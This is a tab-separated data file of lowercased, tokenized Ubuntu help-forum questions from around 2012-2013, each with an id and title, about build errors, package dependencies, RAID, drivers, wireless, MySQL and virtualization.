249974	simon listens 4.0 build - further - error	i 'm a phd researcher in applied anthropology , and i am trying to dictate fieldnotes to my ubuntu 12.04.1 lts ( x86_64 3.2.0-36-generic ) . i undestand simon is a `` simple install-and-go project '' which fits my unix basic skill level . installing simon , i followed instructions on these two other questions unable to install simon and simon listens 4.0 build error , thanks to all of you there ! i could n't solve the problem `` the following packages have unmet dependencies : simon : depends : libattica0 but it is not installable '' , so i started compiling from the source using `` build_ubuntu.sh '' script , as suggested by takakt in the first question above . ( first time for me compiling ) . then i encountered all the problems told by matthiew and xiao-long chen in the second question above . so i installed a lot of libraries . i still have this error : anyone can help me , please ? thanks so much ! ./build_ubuntu.sh -- found qt-version 4.8.1 ( using /usr/bin/qmake ) -- found x11 : /usr/lib/x86_64-linux-gnu/libx11.so -- found kde 4.8 include dir : /usr/include -- found kde 4.8 library dir : /usr/lib -- found the kde4 kconfig_compiler preprocessor : /usr/bin/kconfig_compiler -- found automoc4 : /usr/bin/automoc4 -- found qt-version 4.8.1 ( using /usr/bin/qmake ) -- found x11 : /usr/lib/x86_64-linux-gnu/libx11.so -- found qwt : /usr/lib/libqwt.so cmake warning at /usr/share/kde4/apps/cmake/modules/macrooptionalfindpackage.cmake:32 ( find_package ) : could not find module findqaccessibilityclient.cmake or a configuration file for package qaccessibilityclient . adjust cmake_module_path to find findqaccessibilityclient.cmake or set qaccessibilityclient_dir to the directory containing a cmake configuration file for qaccessibilityclient . the file will have one of the following names : qaccessibilityclientconfig.cmake qaccessibilityclient-config.cmake call stack ( most recent call first ) : cmakelists.txt:56 ( macro_optional_find_package ) -- found sphinxbase -- warning : opencv was not found . please specify opencv directory using opencv_dir env . variable -- backendtype='both' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- the following external packages were located on your system . -- this installation will have the extra features provided by these packages . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - * kde pim libs - kde libraries for pim * sphinxbase - open source toolkit for speech recognition * pocketsphinx - pocketsphinx is a small-footprint continuous speech recognition system -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- the following optional packages could not be located on your system . -- consider installing them to enable more features from this software . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - * libsamplerate < http : //www.mega-nerd.com/src/ > resampling library required to activate resampling . * qaccessibilityclient < https : //projects.kde.org/projects/playground/accessibility/libkdeaccessibilityclient > kde client-side accessibility library required to enable atspi plugin . * opencv < http : //http : //opencv.willowgarage.com/ > opencv ( open source computer vision ) is a library of programming functions for real time computer vision required for simon vision -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : x11_xtest_lib ( advanced ) linked by target `` eventsimulation '' in directory /home/miro/downloads/simon- 0.4.0/simonlib/eventsimulation -- configuring incomplete , errors occurred !
249978	why did my video performance decresase recently ?	i 've been running ubuntu 12.04 for the last month without any problem , just yesterday a problem with the video performance came up . i 'm using compiz ( always used it ) but now , everything is slower and heavy.. like playing a game at 15 fps . i did n't install any updates recently.. so i 'm using same old drivers as two days ago when everything was working great . dell studio 1558 - intel hd - 4gb ram - 250 gb hd - ubuntu as main and unique os with a secondary screen connected to the laptop to extend the desktop .
249980	raid ( mdadm ) - file system relevant prior to building the array ?	in the event i want to set up a raid 1 mirror utilizing mdadm , is it needed to have a file system on the drives first ? reason i ask is my desktop which has raid 1 ( built from the alternate install cd ) says both drives ( via gparted ) are ext4 , along with /dev/md0 which is the usable volume of course . i just set up my server , which is currently resyncing the drives now , but it too had a raid 1 mirror . my drives were unformatted when i added them to the mdadm array via terminal . i had set them as unformatted + set the raid flag via gparted on a liveusb session prior to starting the array build process . that being said , i 'm sitting here wondering - if mdadm basically clobbers the data on the hdds during the rebuild process , how are my desktop raid drives coming up as ext4 when independently looked at ? likewise , does that mean my server will come up in gparted through a liveusb session as unformatted when i look at each drive independently since they were unformatted before i started ? and lastly ... does it matter ? thanks !
249983	12.04 losing display settings on startup	i 'm running ubuntu 12.04 on my desktop at work . it seems like every other week when i boot up my computer it loses its display settings . it 's to the point where i have to bring up the virtual console ( ctrl+alt+f1 ) to stop the lightdm service , reinstall the nvidia driver and reboot . it runs fine every other time ... just once in awhile i have to reinstall the graphics driver . doing this does n't take all that much time ( 5-8 minutes , tops ) , but it 's annoying that i have to do this every couple weeks . system information : ubuntu 12.04 lts memory : 7.8gb processor : amd fx 8120 ( 8 cores ) - 64 bit disk : 2tb graphics card : nvidia quadro fx 1700 graphics driver : nvidia linux x86 ( 64 ) 310.19 ( the most recent version is 310.32 ) any idea what could be causing such an issue ? would upgrading to the most recent linux driver from nvidia fix this issue ?
249984	how to prevent animation during compiz viewport switching ?	i want to turn off animation of windows appearing and disappearing when switching between compiz viewports . i 've tried to turn this animation off by the setting-changes listed in a bullet list below . however , windows still seem to slide or zoom out of the old viewport or into the new viewport whenever i switch viewports , rather than popping instantaneously into place like i want . here is the script i used to test the behavior : # ! /bin/sh s=1.5 ; w=1680 ; h=1050 for y in 2 1 0 ; do for x in 2 1 0 ; do wmctrl -o $ ( ( $ x* $ w ) ) , $ ( ( $ y* $ h ) ) sleep $ s done done note , i installed wmctrl via sudo apt-get install wmctrl . the command line wmctrl -m ; echo $ desktop_session ; echo $ xdg_current_desktop ; cat /etc/issue.net ; cat /proc/version ; uname -a on my i3-2120 cpu @ 3.30ghz system displays the following . name : compiz class : n/a pid : n/a window manager 's `` showing the desktop '' mode : off ubuntu unity ubuntu 12.04.1 lts linux version 3.2.0-36-generic ( buildd @ allspice ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 57-ubuntu smp tue jan 8 21:44:52 utc 2013 linux biti 3.2.0-36-generic # 57-ubuntu smp tue jan 8 21:44:52 utc 2013 x86_64 x86_64 x86_64 gnu/linux here are the setting changes made in my attempts to fix the problem . ( note , several of these settings probably are irrelevant , but i have n't found a discussion that explains which , if any , are relevant to the current problem . ) ( note , ccsm stands for compiz config-settings-manager , which i installed with sudo apt-get install compizconfig-settings-manager ) • on ccsm/effects , unchecked the fading windows and animations boxes . • on ccsm/desktop/desktop wall , set target preview visibility time to zero . • also unchecked show viewport switcher preview and show live viewport previews . • in ccsm with expo in search box , clicked expo , and on behaviour tab set zoom time to 0.1 ( it wo n't go to less ) and checked immediate moves . • set expo animation to zoom ( there is no animation-off option on the tab ) summary of question : how do i turn off animation of windows appearing and disappearing when switching between compiz viewports , and make those windows just appear as quickly as possible ?
249985	how to display buttons in evince ?	i like evince so far , i can read stuff just fine . however , instead of buttons for navigating , i see buttons with words for previous or next ( technically , they are n't buttons as they have no borders at all , they are just plain text ) and open folderas seen in the screenshot below : is it possible to get those buttons ? my system information : xubuntu 12.10 xfce with greybird theme and the default icon set .
249995	unable to install python2.7-dev due to unmet dependencies ubuntu 12.04	i am unable to install python-dev becasue of unment dependancies . how can i get around this ? deleting python is not an option and i cant got back to python2.6-dev as it cant be found . sudo apt-get install python2.7-dev the following packages have unmet dependencies : python-dev : depends : python2.7-dev ( > = 2.7.3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . so try python2.7-dev sudo apt-get install python2.7-dev the following packages have unmet dependencies : python2.7-dev : depends : python2.7 ( = 2.7.3-0ubuntu3 ) but 2.7.3-0ubuntu3.1 is to be installed depends : libpython2.7 ( = 2.7.3-0ubuntu3 ) but 2.7.3-0ubuntu3.1 is to be installed e : unable to correct problems , you have held broken packages . finally check the cache apt-cache policy python python-dev candidate : 2.7.3-0ubuntu2 version table : * 2.7.3-0ubuntu2 0 500 http : //ftp.antik.sk/ubuntu/ precise/main i386 packages 100 /var/lib/dpkg/status python-dev : installed : ( none ) candidate : 2.7.3-0ubuntu2 version table : 2.7.3-0ubuntu2 0 500 http : //ftp.antik.sk/ubuntu/ precise/main i386 packages foo @ ubuntu-virtualbox : ~ $ apt-cache policy python python-dev python : installed : 2.7.3-0ubuntu2 candidate : 2.7.3-0ubuntu2 version table : *** 2.7.3-0ubuntu2 0 500 http : //ftp.antik.sk/ubuntu/ precise/main i386 packages 100 /var/lib/dpkg/status python-dev : installed : ( none ) candidate : 2.7.3-0ubuntu2 version table : 2.7.3-0ubuntu2 0 500 http : //ftp.antik.sk/ubuntu/ precise/main i386 packages
249998	lock widgets to desktop	i am running in the kde plasma environment , and i have 9 workspaces . i would like to somehow set up a way to lock the widgets so that if i switch from one workspace to another , they will still be there . is there any way to do this ?
249999	unstable wireless connection	i have ubuntu 12.10 64 bits kernel 3.5.0-22 running on a dell precision m6700 . the wireless controller is a broadcom bcm43228 ( 802.11abgn , the router also is 802.11abgn ) ; it did n't install on a fresh install , so i added the bcmwl-kernel-source package and i got the wireless network working ... sort of . this is a dual boot machine , and under the same conditions that the connection running windows is stable , running linux it is anything but ; every now and then it disconnects itself , it does n't manage to connect on its own to the router , requiring a repeater ( which is not necessary with windows ) and even then there are times when it connects to the network without really working ( e.g . pinging the router itself returns `` unreachable '' ) . frequently when reconnecting it asks the network password again . at times it does n't manage to connect at all , even with the repeater turned on . things only really work if i am practically stuck to the router , but that sort of defeats the whole idea of wireless connections . any suggestions are greatly appreciated . ken
250001	how do i install eigen2 ?	eigen is a c++ template library for linear algebra : matrices , vectors , numerical solvers , and related algorithms . i 've been having trouble installing it . when i ran cmake '/home/brentonhorne/eigen-eigen-5097c01bcdc4 where /home/brentonhorne/eigen-eigen-5097c01bcdc4 is the location of the source directory extracted from the tarball i downloaded from the eigen website , i received the error : cmake error at cmakelists.txt:8 ( message ) : in-source builds not allowed . please make a new directory ( called a build directory ) and run cmake from there . you may need to remove cmakecache.txt . -- configuring incomplete , errors occurred ! please tell me how to get past this roadblock . i do not understand much programming but if you can explain to me what i need to do in terms of what to paste into terminal i can do it ! if it is needed to help me i am running 12.10 . if you need to know the contents of the install file in the source directory here they are : installation instructions for eigen *********************************** explanation before starting *************************** eigen consists only of header files , hence there is nothing to compile before you can use it . moreover , these header files do not depend on your platform , they are the same for everybody . method 1 . installing without using cmake **************************************** you can use right away the headers in the eigen/ subdirectory . in order to install , just copy this eigen/ subdirectory to your favorite location . if you also want the unsupported features , copy the unsupported/ subdirectory too . method 2 . installing using cmake ******************************** let 's call this directory 'source_dir ' ( where this install file is ) . before starting , create another directory which we will call 'build_dir ' . do : cd build_dir cmake source_dir make install the `` make install '' step may require administrator privileges . you can adjust the installation destination ( the `` prefix '' ) by passing the -dcmake_install_prefix=myprefix option to cmake , as is explained in the message that cmake prints at the end .
250005	i can not install wine on ubuntu 12.10	can anyone help me to install wine ? i can not install it on ubuntu 12.10 . i always get the following message in the terminal : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.22-0ubuntu2 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : ttf-droid recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : ttf-umefont but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages .
250006	rootkits : should i be concerned ?	i was reading some texts about rootkits and the tools used to remove them . i have ubuntu 12.04.1 and rkhunter reported various warnings . i 'm wondering what those are . btw i install only original software , no suspicious programs except avast4workstation which the software center reports as bad file ( because it does n't say how much disk space it 'll use ) so , using ubuntu with original files only and some music downloads , what 's the risk ? how rootkits get installed ? edit : i just installed and updated ubuntu , no software ( besides hunters ) installed . the warnings i got from rkhunter /usr/bin/unhide.rb [ warning ] checking for hidden files and directories [ warning ]
250008	mysql stop/waiting issues ; `` ca n't connect ... through socket ''	so first time putting up a lamp stack on a bodhi machine ( previously experience with wamp , and lamp on 10.04 ) ; i got apache going , and a drupal install begun , then i go to create a new database and when i log in to phpmyadmin ... i get a ' can not connect error ' . tracing this back , i am running into socket connection issues with mysql . initially the problem looked like this : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) using ls -lart /var/run/my* i get this : total 0 drwxr-xr-x 2 mysql root 40 jan 31 11:56 . drwxr-xr-x 21 root root 740 jan 31 12:21 ..` i ran touch /var/run/mysqld/mysqld.sock and set chown -r mysql /var/run/mysqld which allows for : total 0 drwxr-xr-x 21 root root 740 jan 31 12:21 .. -rw-r -- r -- 1 mysql root 0 jan 31 13:58 mysqld.sock drwxr-xr-x 2 mysql root 60 jan 31 13:58 . so when i try to run mysql -u root -p i get one error - error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 13 ) ( note it is no longer error 2002 ... ( 2 ) but rather error 2002 ... ( 13 ) ) if i try service mysql restart ( or stop , start ) i get another error - start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.49 '' ( uid=1000 pid=8407 comm= '' start mysql `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) when i run sudo service mysql restart i get stop : unknown instance : start : job failed to start when i run service mysql status i get `` mysql stop/waiting '' what can i do to diagnose the issues i am having with mysql ? i may be overlooking an utterly simple mysql issue and would appreciate any feedback on what i 've done so far . also , being a bodhi machine and most of the instruction/feedback being written for ubuntu , i am unsure to what extent any ubuntu instruction may not apply . in particular , am i running into a problem related to the difference between /etc/init.d/ ... and service ... ... commands ? or , perhaps , am i running into a difference between libraries of the two ?
250009	graphic driver problem with ubuntu 12.10	i installed ubuntu 12.10 by upgrading from 11.10 32-bit and i am unable to display anything within any windows open when i load ubuntu . my computer has the following video card : g86 [ geforce 8300 gs ] i 'm trying to enable proprietary video drivers from the root shell prompt loaded in recovery mode . i was wondering how to do this , starting with how i enable a wired internet connection from the root shell prompt .
250011	12.10 screen jitters/flickers when ever it needs to redraw graphics	i just got started with ubuntu on my intel nuc ( 16gb ram , 120gb ssd , intel hd 4000 running ubuntu 12.10 ) . managed to solve most of the issues that i 've faced so far but there is this one i just cant get around . my nuc is connected to my tv through hdmi . whenever something updates on the screen , the entire screen kind of vibrates/flickers . so with a blinking cursor the entire screen is blinking . this is extremely annoying . anyone suffered something similar to this ? if so : how did you solve it ? best regards , trezzy
250012	how do i install `` z '' script ?	how do i install the shell `` z '' script directory jumper on ubuntu 12.10 ?
250013	where to suggest user experience enhancements ?	where to report improvements for some applications that have features which can be enhanced . current behavior of such a feature should be working exactly as intended .
250016	problems connecting to netgear dgn1000	i 've just moved house . in my old house we had a virgin media `` super hub '' , and all my devices connected fine . we now have a netgear dgn1000 and my laptops have trouble connnecting ; one laptop is a samsung , running 12.04 , using the wl driver . the other is an asus , running 12.10 , using the iwlwifi driver . both devices have difficulty connecting . they sometimes connect sporadically , but are very slow ( 1-2 seconds to ping another device on the lan ) and drop connection before too long . wired connections work fine we 've got 3 android devices which all work fine over wireless the samsung also has windows 7 , which works fine changing the channel of the wifi seems to help , but it does n't completely solve the problem ( and has never been necessary before , even in a built-up area with lots of other networks nearby ) for a reason i ca n't explain , this seems to be ubuntu-specific . any ideas ?
250017	browse through file databases created by updatedb ( locate ) ?	having indexed external drives using updatedb -l 0 -o db_file -u source_directory i wonder whether there is already a ( gui ) browser like nautilus to navigate offline through the indexed files . note : locate -d db . gives the whole list of files . plus : what format are the dbs -- sqlite ?
250019	how do i move the dock in gnome shell	10 and i 'm just trying to get it the way i want it . to this end i have decided to use the gome-session-manager instead of ubuntu . i am currently using the dock shell extension but it is in a really awkward place in my opinion and i ca n't seem to move it . can it be moved and if so how ? thanks
250026	are charges made on application updates ?	i 'm planning to develop an open source application and am also considering to set a non-zero price for it . if an user purchases the app , will he be charged again when updates are released ?
250028	erratic mouse pointer	after installing xubuntu 12.04 on a amd geode lx800 500 mhz with 128 kb l2 cache machine , the mouse pointer stays on the left top corner of the screen . it will move with the mouse but it goes back to the same spot , so i can not use the mouse at all . any help would be appreciated .
250035	old debian installation boots even after new install of ubuntu	i am just an intermediate user with some start up problems . i broke my really old debian distro and wanted to go to ubuntu , which i installed successfully ; however , for some reason or another my computer keeps booting debian instead of ubuntu . how can i boot ubuntu by default and completely get rid of debian ?
250041	gaming screen recorder	i make gaming videos and recently installed ubuntu and i have n't been able to find a good screen recorder for gaming . are there any recommendations ( preferably free ones ) that can record in hd , use multiple audio sources ( i.e . headset and computer sound ) , and is in the ubuntu software center ? if it 's not in the software center i still might get it , just preferably in the software center . i 've already tried kazam screencaster and recordmydesktop , but they did n't work out for me . thanks guys !
250042	set up ubuntu on virtualbox	i downloaded the virtualbox and added the saasbook-vm-0.9.1.vdi . when i start the virtual machine i 'm getting a prompt : press esc in 0 seconds to skip startup.nsh or any key to continue shell > what am i missing ? what should i do next ? i 'm using a mac with osx 10.7.5
250047	where is the kde policykit authorization manager in kubuntu ?	in order to be able to answer this question , i was looking for a way to manage policykit in kde . using google i quickly ran into the kde 's official authorization manager ( mentioned here and here in the official upstream kde docs ) : however , i can not locate this on my fully fledged kubuntu 12.04.1 installation . it 's not in the system settings while i have installed the packages policykit-desktop-privileges and polkit-kde-1 . it seems it is supposed to be included in the very base of kde since 4.3 according to these docs : policykit is closely integrated with kde starting from version 4.3 . in kdebase-workspace we have an authorization manager and an authentication agent . in ubuntu , the package kdebase-workspace is a transitional package to kde-workspace , which is in turn a metapackage for some basic kde workspace applications - not mentioning anything about policykit or authorization , only the system settings application . now , where is this part of the `` system settings '' in ubuntu nowadays ?
250053	how do i boot ubuntu iso from windows 8	i have a lenovo thinkpad s230u laptop/ultrabook with windows 8 pre-installed on it . it does n't have a cd/dvd drive . i read another question that was similar to mine , but it involved using a live cd , dvd or usb device . i have an ubuntu 12.10 iso file , ready to be mounted . can i install ubuntu directly from an iso , without using a live cd , dvd , or usb device ? if so , how ?
250057	ways to make persistent iso-bootings from hard disk	here i asked how can i save settings when booting an iso file from hard drive . after trying different combinations around sadi 's solution , the only thing that has worked for me is to place the ext2 file called casper-rw in a fat partition , not in the system ext4 partition ( i have n't been able to boot if the file is not in the fat partition ) ; and the only parameter that i need to add to the usual menu entry in grub2 's menu that already booted the iso-image is `` persistent '' ( no reference to the fat partition , but i ignore if 'boot=casper ' makes reference to the casper-rw used for persistence ) . the menu entry is like this : menuentry 'iso booting - ubuntu-64bit.iso live ' { set isofile= '' /home/user/desktop/iso/ubuntu-64bit.iso '' loopback loop ( hd0,3 ) $ isofile linux ( loop ) /casper/vmlinuz boot=casper iso-scan/filename= $ isofile bootkbd=es console-setup/layoutcode=es persistent noprompt noeject -- initrd ( loop ) /casper/initrd.lz } the problem is that the the whole fat partition that contains the casper-rw ext2 file becomes inaccessible ; it ca n't be mounted because it 's busy ; it is displayed , together with the /cow filesystem as mounted in nautilus , but i only see /cow as root in mount 's output . i would like to find a solution without repartitioning . is that possible ?
250063	can not upgrade my ubuntu	possible duplicates : upgrade error . now on half-way between ubuntu 11.10 and 12.04 help ! lost power during upgrade , how do i recover ? i began to upgrade from 11.10 to 12.04 , but someone shut down my computer halfway and now it only offers partial upgrade . how can i undo this and restart the upgrade process , or just complete it ?
250064	how do i get the vt running x in my lxc container to my host ?	i 'm trying to run lubuntu within an lxc container on my host already using a gui . is it possible to redirect the x output from the container to say ; vt9 rather than vt7 ? if so where is the vt7 setting ? will this work given that i only have one graphics card ? any help is greatly appreciated .
250073	how to record any internal sound in and out using ubuntu and audacity	how to record any internal sound like mic in and speaker out from same pc running ubuntu using audacity or something else ? for example under windows someone does like this : ( i want to do the similar ) in windows record internal sound edit : i installed pavucontrol but in record tab it does not show monitor of < your soundcard >
250079	what facets should i consider when deciding which guest to jail in ( `` full '' ) kvm and which in lxc ?	currently i am migrating to a new server . the old one ran 10.04 as host system and a few more 10.04 and debian 6 as kvm guests . this was alright , because the processor had support for virtualization . performance was acceptable . memory was the bottleneck resource for this case . on the new server i have more ram , bigger disks , better cpu and i think it would n't be a problem to tackle the load ( a load that the old one could take without problem ) . however , i would now like to split the guests into some with a shallow lxc based jail and some with the full virtualization under kvm/libvirt , providing me more confidence ( security-wise ) than chroot , but bigger performance than libvirt/kvm at the cost of security drawbacks . some of the guests will have their ips ( v4 and v6 ) `` directly '' exposed to the internet ( at least or two of the web servers ) , while others provide services only to the `` intranet '' . there will also be one nginx instance which acts as a frontend to several web servers that do n't get directly exposed . should this be the guiding factor , though ? the fact whether or not the guests are `` web-facing '' ? my main concern is security followed by performance . the question : what are the facets to consider when deciding which one goes into an lxc jail and which one becomes a full kvm guest ?
250081	ubuntu 12.04 spdif output does n't support multichannel sound	i 'm a relatively new ubuntu-user , and i need a bit of help . i just recently discovered that my laptop ( an acer aspire 5670 ) , has an optical-spdif output and since it 's connected to a 5.1 yamaha receiver i bought a special optical cable and connected them properly . now , i noticed most people usually find at this point that they can not configure their sound cards to output an spdif signal , but that is definitely not the problem in my case , since when i made the connection ubuntu automatically changed the output to spdif ( and properly gave me the option to choose between spdif and analog ) and i could hear everything just fine ( more than fine actually , since the sound was greatly improved ! ) . however , what did happen was that the spdif signal was set to 2 channel stereo and there is no option whatsoever for multichannel sound through the spdif output ! ( while , there is a 5.1-analogue output option , which i tried while the laptop was connected with the spdif cable and obviously nothing happened ) so even though i played video files with multichannel sound ( 6channel ac3 and dts ) the audio reached the receiver as 2-channel pcm . i tried playing the files through different players ( movie player , vlc , smplayer ) but nothing changed . so , here 's hoping someone could help me figure out whether this is a software/driver problem ( and if so , how and if i could possibly fix it ) or a hardware problem , for instance that , maybe , my sound card can output spdif but only for 2ch . audio ( which would be weird but possible i guess ) and in which case , i suppose , i ca n't do much more than accept my defeat ! thanks in advance to anyone that answers ! : )
250082	how do i automate simple video edits ?	i have a set of video clips , that all need the same title/end image added , then cross-faded into ( and at the end , out of ) the video . i figure there 's a way to automate this with ffmpeg or avconv , i just do n't know where to look . or perhaps it 's not that simple , but a cinelerra/open shot/pitivi project file could be 'templatized ' - and the render automated .
250083	how do i install avogadro from source after receiving the error below ?	the following output comes out of the command cmake source-directory while i was in another directory for the compiling . -- the build type is release -- found lupdate : /usr/bin/lupdate-qt4 -- found lrelease : /usr/bin/lrelease-qt4 cmake warning at cmakelists.txt:230 ( message ) : qt4 linguist not found , please install it if you want avogadro translations -- checking for module 'openbabel-2.0 > =2.3.0' -- found openbabel-2.0 , version 2.3.2 -- found openbabel 2.3 or later : openbabel -- found openbabel2 executable : /usr/local/bin/babel -- found git revision is : -- building released version . -- searching for python dependencies ... -- [ 1/5 ] boost python -- could not find boost -- boost python not found - python support disabled . cmake warning at cmakelists.txt:268 ( message ) : not all python dependencies are found - python support diabled -- threaded opengl rendering not enabled -- rpath support enabled for installed binaries and libraries -- found qt4 : /usr/bin/qmake ( found suitable version `` 4.8.3 '' , required is `` 4.6 '' ) -- linking in static plugins : bsdyengine ; navigatetool ; elementcolor -- could not find doxygen ( missing : doxygen_executable ) -- docbook tools not found , doc targets disabled -- configuring done -- generating done -- build files have been written to : /home/brentonhorne/build brentonhorne @ brentonhorne-vostro-3500 : ~/build $ make [ 0 % ] generating moc_elementcolor.cxx scanning dependencies of target elementcolor [ 0 % ] building cxx object libavogadro/src/colors/cmakefiles/elementcolor.dir/elementcolor.cpp.o [ 0 % ] building cxx object libavogadro/src/colors/cmakefiles/elementcolor.dir/moc_elementcolor.cxx.o linking cxx static library elementcolor.a [ 0 % ] built target elementcolor [ 0 % ] generating ui_bsdysettingswidget.h [ 0 % ] generating moc_bsdyengine.cxx scanning dependencies of target bsdyengine [ 0 % ] building cxx object libavogadro/src/engines/cmakefiles/bsdyengine.dir/bsdyengine.cpp.o in file included from /home/brentonhorne/avogadro-1.1.0/libavogadro/src/engines/bsdyengine.cpp:27:0 : /home/brentonhorne/build/libavogadro/include/avogadro/camera.h:103:31 : error : ‘transform3d’ in namespace ‘eigen’ does not name a type /home/brentonhorne/build/libavogadro/include/avogadro/camera.h:103:51 : warning : iso c++ forbids declaration of ‘matrix’ with no type [ -fpermissive ] /home/brentonhorne/build/libavogadro/include/avogadro/camera.h:107:13 : error : ‘transform3d’ in namespace ‘eigen’ does not name a type /home/brentonhorne/build/libavogadro/include/avogadro/camera.h:111:7 : error : ‘transform3d’ in namespace ‘eigen’ does not name a type /home/brentonhorne/build/libavogadro/include/avogadro/camera.h : in member function ‘eigen : :vector3d avogadro : :camera : :v4tov3divw ( const vector4d & ) ’ : /home/brentonhorne/build/libavogadro/include/avogadro/camera.h:343:19 : error : ‘const vector4d’ has no member named ‘start’ /home/brentonhorne/build/libavogadro/include/avogadro/camera.h:343:28 : error : expected primary-expression before ‘ ) ’ token make [ 2 ] : *** [ libavogadro/src/engines/cmakefiles/bsdyengine.dir/bsdyengine.cpp.o ] error 1 make [ 1 ] : *** [ libavogadro/src/engines/cmakefiles/bsdyengine.dir/all ] error 2 make : *** [ all ] error 2 i had installed the prerequisites openbabel and eigen successfully via cmake and qt4 & other prerequisites via apt . the accompanying install file 's contents are : requirements ============ -- cmake 2.6.0 or later ( 2.8.0 recommended ) -- qt 4.5.0 or later ( 4.5.3 recommended ) -- openbabel 2.2.2 or later ( development version from http : //openbabel.svn.sourceforge.net/svnroot/openbabel/openbabel/trunk is recommended ) -- eigen 2.0.3 or later ( 2.0.9 recommended ) basic installation ================== these instructions give a very basic overview of how to configure , compile and install avogadro on most systems . if you are using unique install locations and/or libraries are not automatically detected please consult the 'advanced' section . 1 . create a 'build ' directory in the package source directory . mkdir build cd build 2 . configure the build system cmake ../ 3 . compile make -j2 4 . install sudo make install advanced ======== the build system ( cmake ) provides mechanisms for specifying non-standard installation locations . -dcmake_install_prefix : specify the installation prefix ( default /usr/local ) -dlib_install_dir : specify the install location for libraries ( default $ { cmake_install_prefix } /lib ) -dopenbabel2_libraries : specify the openbabel2 libraries -dopenbabel2_include_dir : specify the openbabel2 include directory -deigen2_include_dir : specify the eigen include directory -denable_python : specify whether to build boost.python interpreter ( default = true ) -denable_update_checker : enable checking for new avogadro versions over the network - linux distributions may want to disable . for more information please consult the cmake documentation . avogadro uses a few environment variables to find things at runtime . if avogadro is installed to the location specified at compile time none of these variables need to be set . avogadro_translations - the location of the translation files . i am running 12.10 if this detail is required .
250086	raid ( mdadm ) - what happens if drives are mismatched in size ?	question 1 - before you answer with `` it just takes the smaller disk '' , hear me out quick . my 3tb wd reds come out to be 3001 gb in size . let 's say i set up a mirror via mdadm for sdb1 and sdc1 which span 100 % of the drive . but suddenly , one of the drives fail . the replacement is a 3tb , weighing in at 3000 gb . what happens when i put in a drive that is smaller than the one currently existent on the array ? i know with a new array using 3000 vs 3001 , it would build the array to be 3000 . but like i said , what about a current array @ 3001 and i add a smaller drive ? does it re-structure itself during the rebuild to be 3000 gb in size ? question 2 - in the event that i ca n't add a 3000 gb to the array with an existing 3001 gb and it simply downsize to 3000 ... can i resize the 3001 down a bit ? question 3 - or , a better idea . what if i downsize my 3tb drive to be 2999 gb . that way whether the drive is short by 1 mb , 1 byte , 10 kb , does n't matter , it 'll always pick up the `` smaller '' drive @ 2999 gb .
250087	how to enable flash only for firefox	i have two browser on my ubuntu 12.10 64bit . chromium and firefox . i want to install flash player but only for firefox to play game and music . but not for chromium . can someone show me how to do that ?
250092	getting error when downloading latest nvidia driver	i have a geforce 7800 gfc . whenever i try to download the official driver from eh site , i get an error . i can download it perfectly well , but after its loading out it says `` error in downloads/ ( something ) . why does the keep happening ? what driver should i get to play tf2 ? because from `` additional driver '' interface i downloaded the second to bottom one and i ca n't run tf2 .
250093	upgrade from ubuntu 12.04 to ubuntu 12.10 secure-remix	is it possible to upgrade an existing ubuntu 12.04 install to ubuntu 12.10 secure-remix ? if so , could that hd be swapped into a new uefi pc ( as the only hd ) and would it boot ?
250096	change wifi key	i was trying to connect to wifi on ubuntu 12.4 when i accidentally typed in the wrong wifi key . now i can not seem to find how to change it . i 've already tried going to the edit connections . the connection i am trying to connect to is not there .
250097	should i include logs that contain `` sensitive information '' ?	sometimes , when info is being collected by ubuntu-bug ( either automatically following a program crash or by manually calling it ) the following dialog pops up : should i include these files or not ? what is `` dangerous '' about someone else know my computer 's hostname ?
250098	how can i recover a raw iso file to a partition ?	well ! i made a iso file from a usb with dd command , like this way ! sudo dd if=/dev/sdc1 of=/var/isos/hbcd.iso conv=noerror my usb had a fat32 file system i tried recover with next commands sudo dd if=/var/isos/hbcd.iso of=/dev/sdc1 conv=noerror but just show small files in root , then trailed next : sudo ddrecover if=/var/isos/hbcd.iso of=/dev/sdc1 /var/isos/hbcd.log but does n't work either i installed sleuthkit autopsy and say me that my restored partition have a raw fs it should be fat32 . how can i recover this data again ?
250103	ca n't get past the grub on install	i do n't have the faintest clue as to what 's going on . i boot from usb and click to install or boot , and it gives me the following screen . does anyone know what 's going on or what i can do to fix this ? i have the asus g75vw . i7 , 8gb ram , nvidia gtx 660 mobile . i know there are issues with install normally , but these are different from what i 'm experiencing .
